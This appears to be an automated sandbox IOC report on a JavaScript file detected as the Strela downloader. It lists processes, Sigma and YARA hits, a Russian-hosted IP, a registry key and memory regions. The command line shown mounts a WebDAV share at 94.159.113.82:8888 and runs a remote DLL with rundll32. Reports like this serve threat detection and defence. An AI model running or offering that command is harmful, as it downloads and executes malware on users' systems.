Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js"

Details

Is windows:	true
Is dropped:	false
PID:	5796
Target ID:	0
Parent PID:	1028
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	02:03:58
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff70e220000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected Strela Downloader	Spam, unwanted Advertisements and Ransom Demands
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry

Details

Is windows:	true
Is dropped:	false
PID:	6220
Target ID:	2
Parent PID:	5796
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	02:03:59
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff658570000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\net.exe

net use \\94.159.113.82@8888\davwwwroot\

Details

Is windows:	true
Is dropped:	false
PID:	5536
Target ID:	4
Parent PID:	6220
Name:	net.exe
Path:	C:\Windows\System32\net.exe
Commandline:	net use \\94.159.113.82@8888\davwwwroot\
Size:	59904
MD5:	0BD94A338EEA5A4E1F2830AE326E6D19
Time:	02:03:59
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7feea0000
Modulesize:	122880
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\rundll32.exe

rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry

Details

Is windows:	true
Is dropped:	false
PID:	2848
Target ID:	5
Parent PID:	6220
Name:	rundll32.exe
Class:	rundll32
Path:	C:\Windows\System32\rundll32.exe
Commandline:	rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
Size:	71680
MD5:	EF3179D498793BF4234F708D3BE28633
Time:	02:04:01
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6a7350000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Runs a DLL by calling functions	System Summary	Rundll32
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7092
Target ID:	3
Parent PID:	6220
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	02:03:59
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://94.159.113.82:8888/

unknown

Details

Name:	http://94.159.113.82:8888/
TargetID:	4
From Memory:	true
Current Path:	C:\Windows\System32\net.exe
Source:	net.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2047049805.0000027507E9E000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045093522.0000027507E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2044707964.0000027507E9C000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.159.113.82:8888/r

unknown

IPs

Domain

Country

Malicious

94.159.113.82

unknown

Russian Federation

Details

IP:	94.159.113.82
TargetID:	4
Current Path:	C:\Windows\System32\net.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49531
ASN name:	NETCOM-R-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
JScript performs obfuscated calls to suspicious functions	Data Obfuscation	Scripting
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Opens network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Connects to IPs without corresponding DNS lookups	Networking
Runs a DLL by calling functions	System Summary	Rundll32
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

Memdumps

Base Address

Regiontype

Protect

Malicious

275080A0000

remote allocation

page read and write

2AF6741B000

heap

page read and write

2AF67436000

heap

page read and write

2AF67440000

heap

page read and write

2AF6740C000

heap

page read and write

2A47FD53000

heap

page read and write

275080A0000

remote allocation

page read and write

2A47DBDF000

heap

page read and write

2AF66F80000

heap

page read and write

2AF65514000

heap

page read and write

2AF67436000

heap

page read and write

2AF673E5000

heap

page read and write

2AF67438000

heap

page read and write

2AF67421000

heap

page read and write

2A47FD50000

heap

page read and write

27507EAF000

heap

page read and write

27507EB6000

heap

page read and write

2AF67436000

heap

page read and write

2AF673CA000

heap

page read and write

D94C0FC000

stack

page read and write

2A47DBE9000

heap

page read and write

2AF65514000

heap

page read and write

2AF67420000

heap

page read and write

2A47F710000

heap

page read and write

2AF654F3000

heap

page read and write

E8F82FF000

stack

page read and write

D94BD5B000

stack

page read and write

2AF673F0000

heap

page read and write

27507E96000

heap

page read and write

2AF67440000

heap

page read and write

2AF67448000

heap

page read and write

2A47FD30000

heap

page read and write

E8F86FB000

stack

page read and write

2AF65514000

heap

page read and write

2AF654EA000

heap

page read and write

2AF6740C000

heap

page read and write

2AF656BA000

heap

page read and write

27507E6D000

heap

page read and write

2AF6744B000

heap

page read and write

2AF67419000

heap

page read and write

2AF673D1000

heap

page read and write

2AF67CF5000

heap

page read and write

2AF673D4000

heap

page read and write

2AF673DA000

heap

page read and write

2AF67429000

heap

page read and write

27507EB6000

heap

page read and write

2AF654F9000

heap

page read and write

2AF65490000

heap

page read and write

2AF673EF000

heap

page read and write

2AF673CB000

heap

page read and write

2AF673EB000

heap

page read and write

27508050000

heap

page read and write

2AF6742C000

heap

page read and write

2AF67440000

heap

page read and write

2AF673EE000

heap

page read and write

2A47DBC8000

heap

page read and write

2A47DBD9000

heap

page read and write

27507E79000

heap

page read and write

2A47DBD9000

heap

page read and write

2AF6740C000

heap

page read and write

2AF674E7000

heap

page read and write

2AF673C7000

heap

page read and write

2AF6740C000

heap

page read and write

2AF673DA000

heap

page read and write

2AF67436000

heap

page read and write

2AF67408000

heap

page read and write

E8F7FFE000

stack

page read and write

2AF656BC000

heap

page read and write

2AF673F3000

heap

page read and write

2AF67442000

heap

page read and write

2AF67436000

heap

page read and write

2AF673DA000

heap

page read and write

2AF673D5000

heap

page read and write

E8F83FE000

stack

page read and write

2AF67420000

heap

page read and write

2AF65680000

heap

page read and write

2AF67730000

heap

page read and write

2AF6740C000

heap

page read and write

2A47DBD6000

heap

page read and write

2AF654E8000

heap

page read and write

2AF673D3000

heap

page read and write

2AF673EE000

heap

page read and write

27507EA9000

heap

page read and write

2AF673D7000

heap

page read and write

2AF67440000

heap

page read and write

2AF654FA000

heap

page read and write

2AF6740C000

heap

page read and write

2AF67435000

heap

page read and write

2AF67443000

heap

page read and write

D94BDDF000

stack

page read and write

27507E6D000

heap

page read and write

2AF673EE000

heap

page read and write

2AF654B8000

heap

page read and write

2AF673F5000

heap

page read and write

2A47DBC0000

heap

page read and write

27507E9E000

heap

page read and write

2AF673C4000

heap

page read and write

2AF67413000

heap

page read and write

2A47DBEE000

heap

page read and write

2AF673CF000

heap

page read and write

2A47DE2B000

heap

page read and write

275081D5000

heap

page read and write

2AF67405000

heap

page read and write

2A47DBEA000

heap

page read and write

2AF673EA000

heap

page read and write

2AF6740A000

heap

page read and write

2AF6740C000

heap

page read and write

27507E96000

heap

page read and write

27507E7C000

heap

page read and write

2A47DCC0000

heap

page read and write

2A47DC07000

heap

page read and write

2AF673ED000

heap

page read and write

E8F7DFF000

stack

page read and write

2AF673FD000

heap

page read and write

2AF656BE000

heap

page read and write

2AF673F0000

heap

page read and write

27507EA3000

heap

page read and write

2AF673D9000

heap

page read and write

2AF6740C000

heap

page read and write

27507E79000

heap

page read and write

2AF656BC000

heap

page read and write

2A47DBE3000

heap

page read and write

2AF656BC000

heap

page read and write

2AF6742C000

heap

page read and write

E5BACFF000

stack

page read and write

2A47DDA0000

heap

page read and write

E5BA98A000

stack

page read and write

2AF656BA000

heap

page read and write

2AF673C0000

heap

page read and write

2AF67440000

heap

page read and write

2A47DBE2000

heap

page read and write

2A47DBF9000

heap

page read and write

27507E75000

heap

page read and write

2A47DBE2000

heap

page read and write

2AF673DA000

heap

page read and write

E8F81FE000

stack

page read and write

2AF67411000

heap

page read and write

2A47DBE9000

heap

page read and write

2AF673C2000

heap

page read and write

2AF6740C000

heap

page read and write

2A47DBDD000

heap

page read and write

2A4015A0000

trusted library allocation

page read and write

27508030000

heap

page read and write

27507EA9000

heap

page read and write

2AF673FB000

heap

page read and write

2A47DBE3000

heap

page read and write

2AF673DA000

heap

page read and write

2AF656B0000

heap

page read and write

2AF67436000

heap

page read and write

27507E48000

heap

page read and write

2AF6740B000

heap

page read and write

2A47DE25000

heap

page read and write

27507F50000

heap

page read and write

27507EA9000

heap

page read and write

2AF67427000

heap

page read and write

2AF65540000

heap

page read and write

2AF656BB000

heap

page read and write

2A47DBF3000

heap

page read and write

2AF67ABF000

heap

page read and write

2AF673CC000

heap

page read and write

2AF673DA000

heap

page read and write

2AF673E1000

heap

page read and write

2AF67440000

heap

page read and write

2AF673DD000

heap

page read and write

2AF673EE000

heap

page read and write

2AF67408000

heap

page read and write

2AF654FE000

heap

page read and write

2AF654B9000

heap

page read and write

E5BAC7F000

stack

page read and write

27507EAF000

heap

page read and write

2AF673C2000

heap

page read and write

2AF67439000

heap

page read and write

2AF673C6000

heap

page read and write

2A47DBE2000

heap

page read and write

2AF673D4000

heap

page read and write

2AF673DF000

heap

page read and write

2AF673DA000

heap

page read and write

2AF67436000

heap

page read and write

2AF673E3000

heap

page read and write

2A47DE20000

heap

page read and write

2AF673C1000

heap

page read and write

2AF6740C000

heap

page read and write

2AF673CE000

heap

page read and write

275080A0000

remote allocation

page read and write

2AF6798B000

heap

page read and write

2AF67403000

heap

page read and write

2AF673DB000

heap

page read and write

2AF6773E000

heap

page read and write

2A47DDC0000

heap

page read and write

2AF67433000

heap

page read and write

275081D0000

heap

page read and write

27507E9C000

heap

page read and write

2AF673C7000

heap

page read and write

E8F79D9000

stack

page read and write

27507EB6000

heap

page read and write

D94C17E000

stack

page read and write

27507E40000

heap

page read and write

2AF673CB000

heap

page read and write

27507EA2000

heap

page read and write

2A47DBF9000

heap

page read and write

2AF654F0000

heap

page read and write

2AF673C3000

heap

page read and write

2AF67437000

heap

page read and write

2AF6786B000

heap

page read and write

2AF67436000

heap

page read and write

2AF6740C000

heap

page read and write

E8F7CFD000

stack

page read and write

2AF656C0000

heap

page read and write

2A47DBFF000

heap

page read and write

2A47DBE2000

heap

page read and write

2AF656B5000

heap

page read and write

2AF654FC000

heap

page read and write

D94C07F000

stack

page read and write

2AF6740C000

heap

page read and write

2AF67436000

heap

page read and write

2AF655A0000

heap

page read and write

E8F80FE000

stack

page read and write

E8F84FD000

stack

page read and write

27507EAF000

heap

page read and write

There are 209 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
10116429083634339.js

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report10116429083634339.js

Processes

URLs

IPs

Registry

Memdumps

IOC Report
10116429083634339.js